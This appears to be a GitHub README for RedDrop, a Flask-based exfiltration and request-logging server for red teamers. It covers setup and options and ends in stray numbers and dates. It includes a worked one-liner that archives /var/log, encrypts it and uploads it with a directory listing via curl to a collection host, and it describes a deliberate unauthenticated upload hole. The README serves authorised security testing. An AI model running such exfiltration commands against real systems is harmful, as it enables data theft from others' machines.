RedDrop Exfil Server
Check out the accompanying MaverisLabs Blog Post Here!
RedDrop Exfil Server is a Python Flask Web Server for Penetration Testers, Red Teamers, and Security Professionals which features:
- File Upload
- Automatic Payload Processing
- Automatic Archive Extraction
- JSON Logging
- Configurable Options
- Authorization Rules
This software is intended to be used as an a rudementary C2 endpoint for capturing web request data in various scenarios. Some examples may include:
- A blind command injection vulnerability
- An XSS attack where a quick and dynamic web request logging server is needed
- A situation where remote shell access has been obtained and a verbose-logging web-based exfiltration server is desired
Demo
This project is still in development and some features may be buggy. If you run into problems, please open an Issue!
A note on security
This software should not be left generally accessible to the broader Internet. It is built with what some might consider an Arbitrary File Upload vulnerability by intention, and will accept and save files to the local disk without authentication. Due diligence should be taken to ensure that the system this software is deployed to is secured properly. A few recommendations:
- Utilize the Authorization Rules feature of RedDrop to drop requests which do not meet your criteria.
- Place a Reverse Proxy to route and block traffic to this web application
- Whitelist your target's IP space
- Don't auto extract archives without understanding my filtering method
Quick Start
Docker
mkdir uploads logs
docker run --rm -t -v "$PWD/uploads:/reddrop/uploads" -v "$PWD/logs:/reddrop/logs" -p "80:80" --name reddrop cyberbutler/reddrop -h
PipEnv
pip install --user pipenv
pipenv install
pipenv shell
python reddrop-server.py -h
Options
python reddrop-server.py -h
A Webserver for File and Data Exfiltration.
Author: @cyberbutler/@thecyberbutler
optional arguments:
-h, --help show this help message and exit
--host HOST, -H HOST The host IP Address to bind to (default:
0.0.0.0)
--port PORT, -P PORT The port to bind to (default: 80)
-c CONFIG, --config CONFIG
YAML config file path (default: None)
--dump-config Dump the configuration settings as YAML
(default: False)
--debug Enable Flask's Debug Mode (default: False)
-p {hex,openssl-aes256-pbkdf2,gzip,b64}, --processor {hex,openssl-aes256-pbkdf2,gzip,b64}
Specify a processor to use. This flag can
be used more than once to define multiple
process_list functions. Use this flag in
the order in which you wish to process
received data (default: [])
-A, --auto-process, --no-auto-process
Automatically run processors based on
detected data. This option is enabled by
default, but should be disabled (--no-
auto-process) when you receive output you
don't expect. Such as in the case of
Base64 decoding being run on output that
is not Base64 encoded. Instead, force the
process with the `-p` flag. (default:
True)
--auto-extract-tar, -x
Auto extract TAR archives received by the
server. (default: False)
--encryption-password PROCESSOR_ARGUMENTS.OPENSSL-AES256-PBKDF2.PASSWORD
The password used to decrypt/encrypt.
(default: EncryptMe)
-r AUTHORIZATION_RULES, --authorization_rules AUTHORIZATION_RULES
Specify an Authorization Rule to deny
requests which do not match the provided
Key and Regex value pair. Specified as
<Key>=<Regex>. (default: None)
-t TAGS, --tag TAGS Tag data received during this session in the logs as well as the directory files are uploaded to. Example:
-t log4j -t acme.org (default: None)
--tls-keyfile GUNICORN.KEYFILE
Enables TLS Support. (Production Only) The path to a TLS key file (default: None)
--tls-certfile GUNICORN.CERTFILE
Enables TLS Support. (Production Only) The path to a TLS cert file (default: None)
Far more configuration options exist which must be specified in Environment Variables, use `--dump-config` to see all of the options
Examples
Exfiltrating a Tar archive and command output from a Linux system
tar cz /var/log | base64 | xxd -ps | gzip | openssl enc -aes-256-cbc -pass 'pass:EncryptMe' -e -a -pbkdf2 | curl 172.17.0.1$PWD -F '[email protected]' -F "listing=`ls -al * | gzip | base64`"
Todo
- Greater documentation of techniques using this web server
- Chunked File Upload handling and example commands
- More Processing modules
- Expand archive extraction functionality
10 Oct 31, 2022
27 Dec 20, 2022
11 Aug 07, 2022
17 Nov 09, 2022
5 Nov 18, 2022
826 Jan 01, 2023
1 Dec 09, 2021
23 Dec 02, 2022
24 Nov 09, 2022
29 Nov 09, 2022
86 Dec 09, 2022
8 Dec 20, 2022
30 Dec 06, 2022
45 Dec 11, 2022
0 Dec 20, 2021
12 Dec 17, 2022
30 Nov 19, 2022
77 Dec 06, 2022
6 Oct 07, 2022
2 Mar 23, 2022